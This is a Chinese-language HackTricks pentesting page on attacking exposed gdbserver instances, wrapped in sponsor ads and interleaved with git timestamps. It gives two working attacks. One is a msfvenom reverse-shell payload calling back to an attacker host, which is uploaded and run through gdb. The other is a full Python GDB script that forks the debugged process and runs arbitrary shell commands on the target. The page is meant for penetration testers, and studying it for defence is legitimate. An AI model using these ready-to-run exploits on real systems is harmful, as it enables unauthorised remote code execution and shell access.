2024-03-29 21:06:45 +00:00
# 远程GdbServer渗透测试
2022-04-28 16:01:33 +00:00
< details >
2024-03-29 21:06:45 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( ) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-03-29 21:06:45 +00:00
支持HackTricks的其他方式:
2024-01-11 13:57:14 +00:00
2024-03-29 21:06:45 +00:00
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT收藏品](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或在**Twitter**上关注我们 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
2023-04-30 21:54:03 +00:00
< / details >
2022-04-28 16:01:33 +00:00
2024-03-29 21:06:45 +00:00
< figure > < img src = "../.gitbook/assets/image (2) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-04-28 16:01:33 +00:00
2024-03-29 21:06:45 +00:00
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试, , ,
2022-04-28 16:01:33 +00:00
2024-01-11 13:57:14 +00:00
{% embed url="https://pentest-tools.com/" %}
2022-04-28 16:01:33 +00:00
2023-08-03 19:12:22 +00:00
## **基本信息**
2021-11-25 01:02:20 +00:00
2024-03-29 21:06:45 +00:00
**gdbserver**是一种工具,可以远程调试程序。它与需要调试的程序一起在同一系统上运行,称为“目标”。这种设置允许**GNU调试器**从存储源代码和调试程序的二进制副本的不同计算机“主机”连接。**gdbserver**和调试器之间的连接可以通过TCP或串行线路进行,
2021-11-25 01:02:20 +00:00
2024-03-29 21:06:45 +00:00
您可以让**gdbserver**在任何端口上监听,目前**nmap无法识别该服务**。
2021-11-25 01:02:20 +00:00
2024-01-11 13:57:14 +00:00
## 利用
2021-11-25 01:02:20 +00:00
2023-08-03 19:12:22 +00:00
### 上传和执行
2021-11-25 01:02:20 +00:00
2024-03-29 21:06:45 +00:00
您可以使用**msfvenom轻松创建elf后门**,上传并执行:
2021-11-25 01:02:20 +00:00
```bash
# Trick shared by @B1n4rySh4d0w
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf
chmod +x binary.elf
gdb binary.elf
# Set remote debuger target
target extended-remote 10.10.10.11:1337
# Upload elf file
remote put binary.elf binary.elf
# Set remote executable file
set remote exec-file /home/user/binary.elf
# Execute reverse shell executable
run
# You should get your reverse-shell
```
2023-08-03 19:12:22 +00:00
### 执行任意命令
2021-11-25 01:02:20 +00:00
2024-03-29 21:06:45 +00:00
有另一种方法可以通过[此处获取的**Python自定义脚本**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target)使调试器执行任意命令。
2021-11-25 01:02:20 +00:00
```bash
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
target extended-remote 192.168.1.4:2345
# Load our custom gdb command `rcmd`.
source ./remote-cmd.py
# Change to a trusty binary and run it to load it
set remote exec-file /bin/bash
r
# Run until a point where libc has been loaded on the remote process, e.g. start of main().
tb main
r
# Run the remote command, e.g. `ls`.
rcmd ls
```
2024-02-05 02:56:36 +00:00
首先**在本地创建此脚本**:
2021-11-25 01:02:20 +00:00
{% code title="remote-cmd.py" %}
```python
#!/usr/bin/env python3
import gdb
import re
import traceback
import uuid
class RemoteCmd(gdb.Command):
2023-08-03 19:12:22 +00:00
def __init__ (self):
self.addresses = {}
self.tmp_file = f'/tmp/{uuid.uuid4().hex}'
gdb.write(f"Using tmp output file: {self.tmp_file}.\n")
gdb.execute("set detach-on-fork off")
gdb.execute("set follow-fork-mode parent")
gdb.execute("set max-value-size unlimited")
gdb.execute("set pagination off")
gdb.execute("set print elements 0")
gdb.execute("set print repeats 0")
super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)
def preload(self):
for symbol in [
"close",
"execl",
"fork",
"free",
"lseek",
"malloc",
"open",
"read",
]:
self.load(symbol)
def load(self, symbol):
if symbol not in self.addresses:
address_string = gdb.execute(f"info address {symbol}", to_string=True)
match = re.match(
f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE
)
if match and len(match.groups()) > 0:
self.addresses[symbol] = match.groups()[0]
else:
raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')
return self.addresses[symbol]
def output(self):
# From `fcntl-linux.h`
O_RDONLY = 0
gdb.execute(
f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'
)
# From `stdio.h`
SEEK_SET = 0
SEEK_END = 2
gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')
gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')
if int(gdb.convenience_variable("len")) < = 0:
gdb.write("No output was captured.")
return
gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')
gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')
gdb.execute('printf "%s\\n", (char*) $mem')
gdb.execute(f'call (int){self.load("close")}($fd)')
gdb.execute(f'call (int){self.load("free")}($mem)')
def invoke(self, arg, from_tty):
try:
self.preload()
is_auto_solib_add = gdb.parameter("auto-solib-add")
gdb.execute("set auto-solib-add off")
parent_inferior = gdb.selected_inferior()
gdb.execute(f'set $child_pid = (int){self.load("fork")}()')
child_pid = gdb.convenience_variable("child_pid")
child_inferior = list(
filter(lambda x: x.pid == child_pid, gdb.inferiors())
)[0]
gdb.execute(f"inferior {child_inferior.num}")
try:
gdb.execute(
f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>& 1", (char*)0)'
)
except gdb.error as e:
if (
"The program being debugged exited while in a function called from GDB"
in str(e)
):
pass
else:
raise e
finally:
gdb.execute(f"inferior {parent_inferior.num}")
gdb.execute(f"remove-inferiors {child_inferior.num}")
self.output()
except Exception as e:
gdb.write("".join(traceback.TracebackException.from_exception(e).format()))
raise e
finally:
gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')
2021-11-25 01:02:20 +00:00
RemoteCmd()
```
{% endcode %}
2022-04-28 16:01:33 +00:00
2024-03-29 21:06:45 +00:00
< figure > < img src = "../.gitbook/assets/image (2) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-04-28 16:01:33 +00:00
2024-03-29 21:06:45 +00:00
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,让他们有更多时间深入挖掘、弹出 shell 并享受乐趣。
2022-04-28 16:01:33 +00:00
2024-01-11 13:57:14 +00:00
{% embed url="https://pentest-tools.com/" %}
2022-04-28 16:01:33 +00:00
2023-04-30 21:54:03 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-03-29 21:06:45 +00:00
< summary > < strong > 从零开始学习 AWS 黑客技术,成为英雄,使用< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( < / strong > < / a > < strong > ! < / strong > < / summary >
2024-01-11 13:57:14 +00:00
2024-03-29 21:06:45 +00:00
支持 HackTricks 的其他方式:
2022-04-28 16:01:33 +00:00
2024-03-29 21:06:45 +00:00
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )** 上关注我们**。
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) **和** [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) **github 仓库提交 PR 来分享您的黑客技巧** 。
2022-04-28 16:01:33 +00:00
< / details >
